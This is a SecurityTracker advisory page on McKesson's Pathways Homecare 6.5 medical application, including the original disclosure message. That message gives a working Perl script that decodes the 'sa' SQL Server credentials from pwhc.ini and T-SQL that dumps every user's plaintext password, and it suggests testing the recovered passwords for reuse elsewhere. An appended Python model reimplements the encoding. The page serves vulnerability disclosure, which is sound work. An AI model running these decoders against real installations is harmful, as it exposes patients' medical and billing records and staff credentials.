SecurityTracker.com
Category: Application (Generic) > Pathways Homecare
Vendors: McKesson
McKesson's Pathways Homecare Medical Application Discloses Passwords to Local Users
SecurityTracker Alert ID: 1002929
SecurityTracker URL: http://securitytracker.com/id/1002929
CVE Reference: GENERIC-MAP-NOMATCH
Date: Dec 9 2001
Impact: Disclosure of authentication information, User access via local system
Exploit Included: Yes
Version(s): 6.5
Description: A vulnerability has been reported in McKesson's Pathways Homecare medical application. A local user can obtain the access passwords for all users on the system.

It is reported that Pathways Homecare uses a weak password encoding scheme that can be decoded by local users to obtain the 'sa' SQL Server account password as well as application passwords for all users of the application.

With this password information, a user can obtain patient information, billing information and medical records.

It is reported that the file pwhc.ini contains an encoded username and password.

It is reported that the username and password are encoded by subtracting a certain number from each byte of the reverse-ordered username/password string. If the length of the username/password information is odd, the following sequence of numbers is apparently used: 3, 8, 5, 10, 7, [...]. If the length is even, the sequence is apparently 7, 4, 9, 6, 11, [...].

A user can also apply the same encoding scheme with a different sequence of numbers to decode the username and password for every user of the system.

Demonstration exploit code is provided in the Source Message.

The vendor has reportedly been notified.

Impact: A local user can decode a password to gain access to the system. A user can also decode the passwords for all users of the system.
Solution: No solution was available at the time of this entry.
Vendor URL: www.mckesson.com
Cause: Access control error
Underlying OS: Windows (NT), Windows (95), Windows (98), Windows (2000)

Message History: None.


Source Message Contents

Date: Fri, 7 Dec 2001 16:54:24 +0000 (GMT)
Subject: Weak Encryption Vulnerability in Pathways Homecare


Platforms: Windows 95
           Windows 98
           Windows ME
           Windows 2000

Application: Pathways Homecare 6.5

What's the big deal?  Users with access to certain config files can
retrieve 'sa' or equivalent account password for SQL Server 7.0 (MSDE)
as well as retrieve application passwords for all users of the
application.

The full scoop:

According to the vendor, McKesson's Pathways Homecare is the first
comprehensive client/server application introduced to the homecare market
for advanced information management.

Basically it stores patient information, billing information and medical
records for people who receive health care in their homes.  Each clinician
has a laptop and all the laptops are periodically synced with a central
database.  Additionally there is a desktop client for administrative
staff.  Both the laptops and the central database server run Microsoft SQL
Server 7.0.

Workstation and laptop users alike get their connection information from a
file named pwhc.ini which contains an encrypted username and password.
For workstations, the file is stored on a central fileserver and the
account is likely to have dbo level permissions on the central database.
For the laptops, this file is stored locally and the account used is
either 'sa' on the local version of SQL or has equivalent permissions.

As you've probably guessed by now, the vendor (on the web at
www.mckesson.com ) decided to be clever and roll their own encryption
algorithm:

First they determine whether the username/password is even or odd
in length.
If odd, they use the following sequence of numbers: 3,8,5,10,7...
If even, the sequence is 7,4,9,6,11...
Then they reverse the username/password and subtract the corresponding
number in the sequence from each byte.

That wasn't the best of explanations, so here's a bit of perl:

#! /usr/bin/perl -w

################################################################################
# pwhc_crack.pl -- Extracts a password from a Pathways Homecare PWHC.ini file
################################################################################

use strict;

open (PWHC, "pwhc.ini") or die "Unable to open .ini file";
while (<PWHC>) {
   chomp;
   if ($_ =~ /^UserID/) { print "UserID: ", decrypt($_), "\n"; }
   if ($_ =~ /^Password/) { print "Password: ", decrypt($_), "\n"; }
}

################################################################################
# The sad thing is that this isn't the worst part of product.  It's not
# that the vendor is using weak encryption, it's that the quality of
# the encryption is better than most of their code.
################################################################################


sub decrypt {
   my $counter = 0;
   my $key;
   my @cryptstr = split /=/, $_, 2;
   my @revstr = unpack("c*", (scalar reverse $cryptstr[1]));
   if(@revstr % 2) {
      $key = 3;
      while ($counter < @revstr) {
         $revstr[$counter] += $key;
         $counter++;
         $key += ($counter % 2) ? 5 : -3;
      }
   }
   else {
      $key = 7;
      while ($counter < @revstr) {
         $revstr[$counter] += $key;
         $counter++;
         $key += ($counter % 2) ? -3 : 5;
      }
   }
   return pack("c*", (reverse @revstr));
}

__END__


So now anyone who can get access to the config files for Pathways Homecare
can read and modify confidential patient information as well as enjoy sa
privileges on laptop clients, but they still can't use McKesson's usability
disaster of a VB client to access that data in a less inconvenient manner
because it's protected by an additional level of password protection.

Unfortunately the vendor uses the exact same encryption method with slightly
different key sequences for this additional layer of security.  It's
possible to retrieve the username and password for every user in about 2
seconds.  The T-SQL code to do this follows:

SET NOCOUNT ON
DECLARE @evenkey varchar(15)
DECLARE @oddkey varchar(15)
DECLARE @key varchar(15)
DECLARE @cryptstr varchar(15)
DECLARE @position tinyint
DECLARE @length tinyint
DECLARE @usrid varchar(30)

DECLARE pwd_cursor CURSOR FOR SELECT usrID, pwd FROM usr
OPEN pwd_cursor
FETCH NEXT FROM pwd_cursor INTO @usrID, @cryptstr
SET @evenkey = 'FDHFJHLJNLPNRP'
SET @oddkey = 'CGEIGKIMKOMQOSQ'

WHILE (@@FETCH_STATUS = 0)
BEGIN
SET @position = 1
SET @length = datalength(@cryptstr)
IF ((@length % 2) = 1) SET @key = @oddkey
ELSE SET @key = @evenkey

WHILE (@position <= @length)
BEGIN
   SET @cryptstr = STUFF(@cryptstr, (@length - @position) + 1, 1,
       CHAR((ASCII(SUBSTRING(@key, @position, 1)) - 65)
       + ASCII(SUBSTRING(@cryptstr, (@length - @position) + 1, 1))))
   SET @position = @position + 1
END
PRINT @usrID + ' : ' + @cryptstr
FETCH NEXT FROM pwd_cursor INTO @usrID, @cryptstr
END
DEALLOCATE pwd_cursor
GO


Bang!  Out come the passwords and it's time to see if the user uses the
same password elsewhere.

I contacted the security-alert@mckesson.com 2 weeks ago.  I received an
immediate response telling me that my message had been forwarded to the
appropriate parties within the Pathways Homecare product group and that
was the last of it.

Anyway, the best way to mitigate the security vulnerabilities disclosed
here is to not use the product.  Failing that, you should use
integrated security to connect to SQL Server (meaning you can't run
Windows 9x/ME on the laptops, but you shouldn't be doing that anyway).

--Shoeboy
Software is like sex, it's better when RMS isn't involved.
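The encoding scheme that the advisory describes and that the Perl and T-SQL in the message above implement, modelled in Python as an added example (this is not the poster's code and not McKesson's). The point the model makes is that the scheme has no secret: the per-position numbers are fixed constants, so anyone who knows the algorithm can reverse it, and the application-level "second layer" is the same routine with a different constant sequence. Two things here are assumptions of the model rather than statements from the post: each sequence is extended beyond the listed terms by continuing the pattern the listed terms show (two interleaved progressions with step 2), and byte arithmetic wraps modulo 256. The key is applied from the end of the string, which is what both posted decoders do (reverse, add, reverse back). All function names are mine.

```python
# Added example: a model of the Pathways Homecare password encoding.
# Not the posted Perl/T-SQL and not vendor code; see the lead-in for assumptions.


def key_sequence(first, second, length):
    """Per-position key values for a string of the given length.

    Every sequence on the page (3,8,5,10,7... and 7,4,9,6,11... for the .ini
    file, and the letter-derived keys in the T-SQL) interleaves two arithmetic
    progressions with step 2: even positions start at `first`, odd positions
    at `second`. Extending the sequences this way is an assumption; the post
    lists only the first five terms of each.
    """
    return [(first if i % 2 == 0 else second) + (i // 2) * 2
            for i in range(length)]


def pwhc_keys(length):
    """Sequence the .ini decoder selects by the parity of the string length."""
    if length % 2:
        return key_sequence(3, 8, length)   # odd length: 3, 8, 5, 10, 7, ...
    return key_sequence(7, 4, length)       # even length: 7, 4, 9, 6, 11, ...


def tsql_key_string_to_sequence(key_string):
    """Keys the T-SQL routine derives from its letter strings: ASCII code - 65.

    'FDHFJHLJNLPNRP' -> 5, 3, 7, 5, 9, ... and 'CGEIGKIMKOMQOSQ' -> 2, 6, 4, 8, ...
    which are the same shape of sequence with different starting values.
    """
    return [ord(ch) - 65 for ch in key_string]


def decode(encoded, keys=None):
    """Mirror of the posted decoders: reverse, add key[i] to byte i, reverse back.

    Equivalently, key[j] is added to the j-th byte counted from the end of the
    string. With no explicit key sequence the .ini parity rule is used.
    """
    keys = pwhc_keys(len(encoded)) if keys is None else keys
    reversed_bytes = [ord(ch) for ch in reversed(encoded)]
    plain_reversed = [(b + k) % 256 for b, k in zip(reversed_bytes, keys)]
    return "".join(chr(b) for b in reversed(plain_reversed))


def encode(plain, keys=None):
    """Inverse of decode: what the application must do when it writes a value.

    Because the only inputs are the plaintext and fixed constants, this is an
    encoding, not encryption; nothing here depends on a secret.
    """
    keys = pwhc_keys(len(plain)) if keys is None else keys
    reversed_bytes = [ord(ch) for ch in reversed(plain)]
    encoded_reversed = [(b - k) % 256 for b, k in zip(reversed_bytes, keys)]
    return "".join(chr(b) for b in reversed(encoded_reversed))


if __name__ == "__main__":
    # Constructed sample values, not taken from any real installation.
    for sample in ("sa", "abc", "constructed"):
        enc = encode(sample)
        print(f"{sample!r} -> {enc!r} -> {decode(enc)!r}")
    even_keys = tsql_key_string_to_sequence("FDHFJHLJNLPNRP")
    print("T-SQL even-length keys:", even_keys)
    print("same shape as key_sequence(5, 3, 14):", even_keys == key_sequence(5, 3, 14))
```

The model confirms what the post says about the "slightly different key sequences": the T-SQL letter strings, once reduced by 65, are sequences of exactly the same form as the .ini ones with different starting values, so the application layer adds no protection beyond the file layer.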


Copyright 2014, SecurityGlobal.net LLC